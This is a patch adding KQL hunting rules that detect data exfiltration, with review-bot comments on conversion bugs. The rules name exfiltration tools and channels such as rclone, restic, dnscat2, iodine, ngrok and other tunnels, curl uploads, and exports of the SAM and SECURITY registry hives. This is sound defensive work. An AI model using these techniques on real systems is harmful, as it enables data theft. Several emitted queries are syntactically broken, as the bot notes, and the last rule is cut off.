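Review bot: The second description line, `Attackers could instantiate an instance of "wusa.exe" ...`, is emitted without the `//` prefix, so the generated file is not a valid KQL query: Kusto will try to parse that sentence as a statement ahead of `DeviceProcessEvents` and the rule will fail to run as written. The hunk count (+12) confirms it is a separate line rather than a continuation of the `// Description:` line, so this looks like the converter's multi-line description handling dropping the comment marker; the same shape appears in several other files in this patch. Every description line should be written as `// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). ...`, and the converter should prefix each line of a multi-line description rather than only the first.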
@@ -0,0 +1,10 @@
+// Title: Active Directory Structure Export Via Csvde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
new file mode 100644
index 00000000..5f3de5a1
--- /dev/null
+++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
@@ -0,0 +1,10 @@
+// Title: Active Directory Structure Export Via Ldifde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
new file mode 100644
index 00000000..eda1204f
--- /dev/null
+++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
@@ -0,0 +1,13 @@
+// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
+Users can configure different pilot collections for each of the co-management workloads.
+It can be abused by attackers in order to upload or download files.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
new file mode 100644
index 00000000..e96ef768
--- /dev/null
+++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
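Review bot: Two description lines, `Users can configure different pilot collections ...` and `It can be abused by attackers ...`, are written without a `//` prefix, so this file will not parse as KQL until they are commented (`// Users can configure ...`, `// It can be abused ...`). Otherwise the query is a faithful conversion; note that `ProcessCommandLine contains "ConfigSecurityPolicy.exe"` on its own catches the rare case where the binary is invoked through another launcher but also matches any command line that merely mentions the name, which is acceptable at medium level but worth a false-positives note.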
@@ -0,0 +1,15 @@
+// Title: Communication To Ngrok Tunneling Service Initiated
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
+Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+// - Legitimate use of the ngrok service.
+
+DeviceNetworkEvents
+| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
new file mode 100644
index 00000000..f842d018
--- /dev/null
+++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
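Review bot: The `| where` clause relies solely on `RemoteUrl`, which in `DeviceNetworkEvents` is only populated when the sensor can attribute a hostname to the connection; in my experience many outbound TCP connections carry only `RemoteIP`, so the ngrok tunnel endpoints may be missed unless a DNS-side source is also queried. A companion query over the DNS query events (hostname fields in `DeviceEvents` for the same domains) would close that gap, and the detection logic is worth documenting as "hostname-attributed connections only". Separately, the two description lines `Attackers were seen using this "ngrok" ...` and `While communication with such domains ...` lack the `//` prefix and will break parsing until commented.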
@@ -0,0 +1,12 @@ +// Title: Communication To Ngrok Tunneling Service - Linux +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of ngrok + +DeviceNetworkEvents +| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql new file mode 100644 index 00000000..ffa803a4 --- /dev/null +++ b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql @@ -0,0 +1,12 @@ +// Title: Disk Image Creation Via Hdiutil - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-10 +// Level: medium +// Description: Detects the execution of the hdiutil utility in order to create a disk image. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration +// False Positives: +// - Legitimate usage of hdiutil by administrators and users. + +DeviceProcessEvents +| where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql new file mode 100644 index 00000000..32245d57 --- /dev/null 
+++ b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql @@ -0,0 +1,12 @@ +// Title: DNS Exfiltration and Tunneling Tools Execution +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Well-known DNS Exfiltration tools execution +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql new file mode 100644 index 00000000..ca744e1f --- /dev/null +++ b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql @@ -0,0 +1,10 @@ +// Title: Email Exifiltration Via Powershell +// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) +// Date: 2022-09-09 +// Level: high +// Description: Detects email exfiltration via powershell cmdlets +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql new file mode 100644 index 00000000..f03b6c91 --- /dev/null +++ b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql 
@@ -0,0 +1,12 @@
+// Title: Exports Critical Registry Keys To a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the export of a crital Registry key to a file.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1012
+// False Positives:
+// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
new file mode 100644
index 00000000..f03b6c91
--- /dev/null
+++ b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
@@ -0,0 +1,12 @@ +// Title: Exports Registry Key To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: low +// Description: Detects the export of the target Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Legitimate export of keys + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql new file mode 100644 index 00000000..d38ffa8d --- /dev/null +++ b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql 
@@ -0,0 +1,14 @@ +// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe +// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567 +// False Positives: +// - DataSvcUtil.exe being used may be performed by a system administrator. +// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql new file mode 100644 index 00000000..33cf9a91 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated To BTunnels Domains +// Author: Kamran Saifullah +// Date: 2024-09-13 +// Level: medium +// Description: Detects network connections to BTunnels domains initiated by a process on the system. +Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of BTunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".btunnel.co.in" \ No newline at end of file 
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql new file mode 100644 index 00000000..78fc2960 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated To Cloudflared Tunnels Domains +// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-27 +// Level: medium +// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. +Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of cloudflare tunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql new file mode 100644 index 00000000..f415abb5 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql 
@@ -0,0 +1,13 @@
+// Title: Network Connection Initiated To DevTunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572
+// False Positives:
+// - Legitimate use of Devtunnels will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".devtunnels.ms"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
new file mode 100644
index 00000000..af4e15e6
--- /dev/null
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
@@ -0,0 +1,14 @@
+// Title: Network Connection Initiated To Mega.nz
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: low
+// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
+Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
new file mode 100644
index 00000000..4d666698
--- /dev/null
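Review bot: In the mega.nz hunk the suffix match `RemoteUrl endswith "mega.nz"` is not anchored at a label boundary, so any hostname whose characters happen to end in `mega.nz` (for example a host under `omega.nz`) satisfies it, and the same applies to `endswith "mega.co.nz"`; the description also names only `api.mega.co.nz`, narrower than what the filter catches. Anchoring on the dot keeps the intent while removing the overlap: `RemoteUrl =~ "mega.nz" or RemoteUrl endswith ".mega.nz" or RemoteUrl =~ "mega.co.nz" or RemoteUrl endswith ".mega.co.nz"`. The description continuation `Attackers were seen abusing file sharing websites ...` is missing its `//` prefix and will break the query until commented.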
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql @@ -0,0 +1,13 @@ +// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".tunnels.api.visualstudio.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql new file mode 100644 index 00000000..dcb07426 --- /dev/null +++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql 
@@ -0,0 +1,15 @@ +// Title: Process Initiated Network Connection To Ngrok Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-16 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" domains. +Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/Exfiltration/pua_rclone_execution.kql new file mode 100644 index 00000000..e979ab9b --- /dev/null +++ b/KQL/rules/Exfiltration/pua_rclone_execution.kql 
@@ -0,0 +1,10 @@ +// Title: PUA - Rclone Execution +// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-10 +// Level: high +// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql new file mode 100644 index 00000000..7ad87026 --- /dev/null +++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql 
@@ -0,0 +1,15 @@
+// Title: PUA - Restic Backup Tool Execution
+// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
+Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
+If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, attack.t1567.002
+// False Positives:
+// - Legitimate use of Restic for backup purposes within the organization.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r "))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
new file mode 100644
index 00000000..023d6cf5
--- /dev/null
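Review bot: The two description lines `Threat actors may leverage Restic ...` and `If not legitimately used ...` are emitted without `//`, so the file is not a runnable query until they are commented. Also worth documenting: the `| where` clause is purely command-line based with no image or original-file-name constraint, which is presumably intentional so a renamed restic binary is still caught, but it means `--password-file` + `init` + ` -r ` or `--use-fs-snapshot` + `backup` + ` -r ` from any other tool will fire at high severity; a comment such as `// No image filter on purpose: catches renamed restic binaries; tune on InitiatingProcess if noisy` would make that trade-off explicit.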
@@ -0,0 +1,15 @@ +// Title: Python WebServer Execution - Linux +// Author: Mohamed LAKRI +// Date: 2025-10-17 +// Level: medium +// Description: Detects the execution of Python web servers via command line interface (CLI). +After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. +This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Testing or development activity + +DeviceProcessEvents +| where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/Exfiltration/rclone_config_file_creation.kql new file mode 100644 index 00000000..876c3f50 --- /dev/null +++ b/KQL/rules/Exfiltration/rclone_config_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Rclone Config File Creation +// Author: Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-26 +// Level: medium +// Description: Detects Rclone config files being created +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 +// False Positives: +// - Legitimate Rclone usage + +DeviceFileEvents +| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql new file mode 100644 index 00000000..fd3ff922 --- /dev/null 
+++ b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql @@ -0,0 +1,12 @@ +// Title: Split A File Into Pieces +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-15 +// Level: low +// Description: Detection use of the command "split" to split files into parts and possible transfer. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1030 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where FolderPath endswith "/split" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql new file mode 100644 index 00000000..8cc06d5b --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Curl File Upload - Linux +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) +// Date: 2022-09-15 +// Level: medium +// Description: Detects a suspicious curl process start the adds a file to a web request +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105 +// False Positives: +// - Scripts created by developers and admins + +DeviceProcessEvents +| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql new file mode 100644 index 00000000..da3bcea0 --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql 
@@ -0,0 +1,14 @@
+// Title: Suspicious Outbound SMTP Connections
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
+The data may also be sent to an alternate network location from the main command and control server.
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+// - Other SMTP tools
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_"))))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
new file mode 100644
index 00000000..af385f82
--- /dev/null
+++ b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Mailbox Export to Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-07
+// Level: critical
+// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
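Review bot: `RemotePort in~ ("25", "587", "465", "2525")` compares an integer column against string literals with the case-insensitive string operator; in Kusto that is either a type-mismatch error or, at best, never matches, so the rule is dead as emitted. It should read `RemotePort in (25, 587, 465, 2525)`. This is a converter-level issue (the backend is mapping Sigma's string-typed `DestinationPort` list onto an int column), so the same shape is likely in other port-based rules produced by this script and deserves a typed-field mapping rather than a one-off fix. The description continuation `The data may also be sent ...` is also missing its `//` prefix.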
diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql
new file mode 100644
index 00000000..0407bd60
--- /dev/null
+++ b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Redirection to Local Admin Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-16
+// Level: high
+// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..cab4b0a0
--- /dev/null
+++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious WebDav Client Execution Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-03-16
+// Level: high
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
+
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397
+
+DeviceProcessEvents
